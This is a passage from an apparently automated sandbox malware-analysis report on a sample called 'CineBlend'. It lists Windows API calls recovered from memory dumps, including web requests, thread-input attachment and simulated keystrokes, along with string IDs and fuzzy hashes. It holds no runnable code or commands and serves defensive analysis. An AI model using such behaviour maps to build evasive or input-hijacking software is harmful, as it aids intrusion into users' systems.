                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB7F
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABBC4
                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABBD9
                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABBE4
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: c43603317952503fd9e86093efc3ac417c52b12fd77d8858383bcff1010471c2
                                          • Instruction ID: 2c4ff94cfa5515ebbcd8d40e353efd322dc2d065cfd9b54691f7610ced3a8e59
                                          • Opcode Fuzzy Hash: c43603317952503fd9e86093efc3ac417c52b12fd77d8858383bcff1010471c2
                                          • Instruction Fuzzy Hash: 1431BDB2A09204AFDB14DB25DC98FAD77E9FB0B312F518096FA15D71A1DBB4D8408B70
                                          APIs
                                          • _free.LIBCMT ref: 00B73007
                                            • Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
                                            • Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60
                                          • _free.LIBCMT ref: 00B73013
                                          • _free.LIBCMT ref: 00B7301E
                                          • _free.LIBCMT ref: 00B73029
                                          • _free.LIBCMT ref: 00B73034
                                          • _free.LIBCMT ref: 00B7303F
                                          • _free.LIBCMT ref: 00B7304A
                                          • _free.LIBCMT ref: 00B73055
                                          • _free.LIBCMT ref: 00B73060
                                          • _free.LIBCMT ref: 00B7306E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: ffdced1f33752c0ea555366b233fba3f8768fb3feb52693ed267598f20e4ead8
                                          • Instruction ID: be693b7dd4d1fc5c7a95e7ab547c1a9d07d5db35a9b21b54de7e0147a9392f90
                                          • Opcode Fuzzy Hash: ffdced1f33752c0ea555366b233fba3f8768fb3feb52693ed267598f20e4ead8
                                          • Instruction Fuzzy Hash: 02117276500108EFCB11EF94C842DDD3BA9EF09350F9185E5FA1C9F222DA32EA519B90
                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB89F2
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8A06
                                          • GetFileAttributesW.KERNEL32(?), ref: 00BB8A30
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BB8A4A
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8A5C
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8AA5
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BB8AF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$AttributesFile
                                          • String ID: *.*
                                          • API String ID: 769691225-438819550
                                          • Opcode ID: 00a345608547959d74472f14324b25d200974a0864d656035aa4d3ccf33490df
                                          • Instruction ID: 75b6c4f5ecfda005ded8acb7c720fec563f23b111a4ee68e9452cab7c0952768
                                          • Opcode Fuzzy Hash: 00a345608547959d74472f14324b25d200974a0864d656035aa4d3ccf33490df
                                          • Instruction Fuzzy Hash: 1C818E719042459BCB24EF14C884ABAB3ECFF84310F5448AAF8C9D7250EFB4DA45CB92
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00B474D7
                                            • Part of subcall function 00B47567: GetClientRect.USER32(?,?), ref: 00B4758D
                                            • Part of subcall function 00B47567: GetWindowRect.USER32(?,?), ref: 00B475CE
                                            • Part of subcall function 00B47567: ScreenToClient.USER32(?,?), ref: 00B475F6
                                          • GetDC.USER32 ref: 00B86083
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B86096
                                          • SelectObject.GDI32(00000000,00000000), ref: 00B860A4
                                          • SelectObject.GDI32(00000000,00000000), ref: 00B860B9
                                          • ReleaseDC.USER32(?,00000000), ref: 00B860C1
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B86152
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: c5cb05847d35af57b674440f8d7752ce55677f46d5d4383dd15ca67fd5e62867
                                          • Instruction ID: 3a038abeb8499602ca2f10f65c575526d10052044c1596de73a94216198992bb
                                          • Opcode Fuzzy Hash: c5cb05847d35af57b674440f8d7752ce55677f46d5d4383dd15ca67fd5e62867
                                          • Instruction Fuzzy Hash: 9E71AE31500205DFCF25AF68C8C9ABA7BF5FF49320F1442EAE9556A2B7DB318940EB50
                                          APIs
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                            • Part of subcall function 00B419CD: GetCursorPos.USER32(?), ref: 00B419E1
                                            • Part of subcall function 00B419CD: ScreenToClient.USER32(00000000,?), ref: 00B419FE
                                            • Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000001), ref: 00B41A23
                                            • Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000002), ref: 00B41A3D
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00BD95C7
                                          • ImageList_EndDrag.COMCTL32 ref: 00BD95CD
                                          • ReleaseCapture.USER32 ref: 00BD95D3
                                          • SetWindowTextW.USER32(?,00000000), ref: 00BD966E
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BD9681
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00BD975B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 1924731296-2107944366
                                          • Opcode ID: 8b8e7cf6a5e0dc51d511bc94fb7b1abbd4e788683e0fd24b7429725588729470
                                          • Instruction ID: 3b107416d3ddb3de787b557a1967f3f1154878ee7190c4ff88a61826f13d02c1
                                          • Opcode Fuzzy Hash: 8b8e7cf6a5e0dc51d511bc94fb7b1abbd4e788683e0fd24b7429725588729470
                                          • Instruction Fuzzy Hash: 1D518E75204300AFD704EF24CC56FAAB7E4FB88714F40066AF595972E1EB709E08DB52
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BBCCB7
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BBCCDF
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BBCD0F
                                          • GetLastError.KERNEL32 ref: 00BBCD67
                                          • SetEvent.KERNEL32(?), ref: 00BBCD7B
                                          • InternetCloseHandle.WININET(00000000), ref: 00BBCD86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3113390036-3916222277
                                          • Opcode ID: 2e43f30cbdf6a6f54f96976ca8be254552f4534f21e9a4e32b9be50f4b31889b
                                          • Instruction ID: 87d3fc211f854be8495ff8c981cda601c6d26e094a1a6e139540d5b535b9b817
                                          • Opcode Fuzzy Hash: 2e43f30cbdf6a6f54f96976ca8be254552f4534f21e9a4e32b9be50f4b31889b
                                          • Instruction Fuzzy Hash: 92314B75601604AFD721EF65CC88ABBBFFCEB45740B1045BAB48693200EBB4ED049BA5
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B855AE,?,?,Bad directive syntax error,00BDDCD0,00000000,00000010,?,?), ref: 00BAA236
                                          • LoadStringW.USER32(00000000,?,00B855AE,?), ref: 00BAA23D
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BAA301
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 858772685-4153970271
                                          • Opcode ID: ef83b84b6027ba230df4f9fb7d417782dee3065b87babb40238647d05c343e98
                                          • Instruction ID: ffd9bb0749cf721257bc1abbd5bf37b7030c840635e354c9ae657cd2edeb0cf1
                                          • Opcode Fuzzy Hash: ef83b84b6027ba230df4f9fb7d417782dee3065b87babb40238647d05c343e98
                                          • Instruction Fuzzy Hash: D621613180421EEBCF06AF90CC46EEE77B5FF18700F0444A5F515660A2EB71A618EB51
                                          APIs
                                          • GetParent.USER32 ref: 00BA29F8
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00BA2A0D
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BA2A9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1290815626-3381328864
                                          • Opcode ID: 2626627fa72a5bfc28e2f933b6d8c9dffce875001f8345aab8806e8e838bde4f
                                          • Instruction ID: 61fce66938aa6a1840bf97b463c63c87f213a2a5fbb8210926938849a8d53734
                                          • Opcode Fuzzy Hash: 2626627fa72a5bfc28e2f933b6d8c9dffce875001f8345aab8806e8e838bde4f
                                          • Instruction Fuzzy Hash: B91125B678C707BAFA246B28EC07DAA7BDCCF16724B2000B2FA05E50D1FF65AC109554
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 00B4758D
                                          • GetWindowRect.USER32(?,?), ref: 00B475CE
                                          • ScreenToClient.USER32(?,?), ref: 00B475F6
                                          • GetClientRect.USER32(?,?), ref: 00B4773A
                                          • GetWindowRect.USER32(?,?), ref: 00B4775B
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Rect$Client$Window$Screen
                                          • String ID:
                                          • API String ID: 1296646539-0
                                          • Opcode ID: bd561a616f2aacb91c511bdac85ac319ea0ba71f74ab40c5d5398157fa19c836
                                          • Instruction ID: 3ac2f6e51af72fec8f66607ec9500f40c186ddd6a4c3a7c880591adb874b75c6
                                          • Opcode Fuzzy Hash: bd561a616f2aacb91c511bdac85ac319ea0ba71f74ab40c5d5398157fa19c836
                                          • Instruction Fuzzy Hash: 54C16D3590465AEFDF10DFA8C580BEDB7F1FF18310F14845AE895A7250DB34AA51EBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 1282221369-0
                                          • Opcode ID: c55ff39da87e4d59cdc95f9742b07215e7ce28c345239c78c65f4a44424deacd
                                          • Instruction ID: 5128bfb43d6895c65ecadb0db63563da0b24f621b29590cd16a59769feca0a27
                                          • Opcode Fuzzy Hash: c55ff39da87e4d59cdc95f9742b07215e7ce28c345239c78c65f4a44424deacd
                                          • Instruction Fuzzy Hash: FF610671904305AFDB22AF74E8817AE7BF4EF023A0F15C5EDED6DA7282E63598018751
                                          APIs
                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00BD5C24
                                          • ShowWindow.USER32(?,00000000), ref: 00BD5C65
                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 00BD5C6B
                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00BD5C6F
                                            • Part of subcall function 00BD79F2: DeleteObject.GDI32(00000000), ref: 00BD7A1E
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD5CAB
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD5CB8
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BD5CEB
                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00BD5D25
                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00BD5D34
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                          • String ID:
                                          • API String ID: 3210457359-0
                                          • Opcode ID: 9dd159731117ec248319221c58e2f51b2c0c646c6064aa7f1d0abade697c96aa
                                          • Instruction ID: 714ac82444e2edbfb30fbe67c1ef1cbf526be14d8a6b02b536d9230c2ff8bfa3
                                          • Opcode Fuzzy Hash: 9dd159731117ec248319221c58e2f51b2c0c646c6064aa7f1d0abade697c96aa
                                          • Instruction Fuzzy Hash: 61518030651A09BFEF349F18CC49F98BBE6EB04750F144193F6149A3E0EB75A9909B51
                                          APIs
                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B828D1
                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B828EA
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B828FA
                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B82912
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B82933
                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B82942
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B8295F
                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B8296E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                          • String ID:
                                          • API String ID: 1268354404-0
                                          • Opcode ID: 3eccd1b1ff15717da0ade051e4a0d42b4d626213edbb26a2529263b8bee8e39c
                                          • Instruction ID: dcf7d41ee51cc244c5cd1472a60388c1c01356863437b6631bf8ba09c0c41338
                                          • Opcode Fuzzy Hash: 3eccd1b1ff15717da0ade051e4a0d42b4d626213edbb26a2529263b8bee8e39c
                                          • Instruction Fuzzy Hash: F0516E34A00205AFDB24DF29CC95BAA77F5FF48714F104969F946972A0DB70E990EB50
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BBCBC7
                                          • GetLastError.KERNEL32 ref: 00BBCBDA
                                          • SetEvent.KERNEL32(?), ref: 00BBCBEE
                                            • Part of subcall function 00BBCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BBCCB7
                                            • Part of subcall function 00BBCC98: GetLastError.KERNEL32 ref: 00BBCD67
                                            • Part of subcall function 00BBCC98: SetEvent.KERNEL32(?), ref: 00BBCD7B
                                            • Part of subcall function 00BBCC98: InternetCloseHandle.WININET(00000000), ref: 00BBCD86
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 337547030-0
                                          • Opcode ID: 4e4ed0cf701e8d997d99a55bf71a46abe4ee88323f484f03d867667ff7281743
                                          • Instruction ID: 60dfe65325b7537ef609d98e6a054053552d9accac585b1aadd59b1d689e5a54
                                          • Opcode Fuzzy Hash: 4e4ed0cf701e8d997d99a55bf71a46abe4ee88323f484f03d867667ff7281743
                                          • Instruction Fuzzy Hash: 84316B71601705AFDB21DF65CD94ABABFF8FF54300B14456EF89A83610DBB1E814ABA0
                                          APIs
                                            • Part of subcall function 00BA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA43AD
                                            • Part of subcall function 00BA4393: GetCurrentThreadId.KERNEL32 ref: 00BA43B4
                                            • Part of subcall function 00BA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BA2F00), ref: 00BA43BB
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA2F0A
                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA2F28
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00BA2F2C
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA2F36
                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BA2F4E
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00BA2F52
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA2F5C
                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BA2F70
                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00BA2F74
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: 747575d3d60ae4c4a2879ef64992e774cf3ff2431f305145ec24c8e8142a8c1a
                                          • Instruction ID: 78c38fd5f978fff9be83699ff7c2bb87b7fe2a950873db117e36581cfbd80584
                                          • Opcode Fuzzy Hash: 747575d3d60ae4c4a2879ef64992e774cf3ff2431f305145ec24c8e8142a8c1a
                                          • Instruction Fuzzy Hash: 3501D430788210BBFB1067689C8AF597F9ADB8EB11F100052F358AF1E0CDF264448AA9
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00BA1D95,?,?,00000000), ref: 00BA2159
                                          • HeapAlloc.KERNEL32(00000000,?,00BA1D95,?,?,00000000), ref: 00BA2160
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA1D95,?,?,00000000), ref: 00BA2175
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00BA1D95,?,?,00000000), ref: 00BA217D
                                          • DuplicateHandle.KERNEL32(00000000,?,00BA1D95,?,?,00000000), ref: 00BA2180
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA1D95,?,?,00000000), ref: 00BA2190
                                          • GetCurrentProcess.KERNEL32(00BA1D95,00000000,?,00BA1D95,?,?,00000000), ref: 00BA2198
                                          • DuplicateHandle.KERNEL32(00000000,?,00BA1D95,?,?,00000000), ref: 00BA219B
                                          • CreateThread.KERNEL32(00000000,00000000,00BA21C1,00000000,00000000,00000000), ref: 00BA21B5
                                          Memory Dump Source
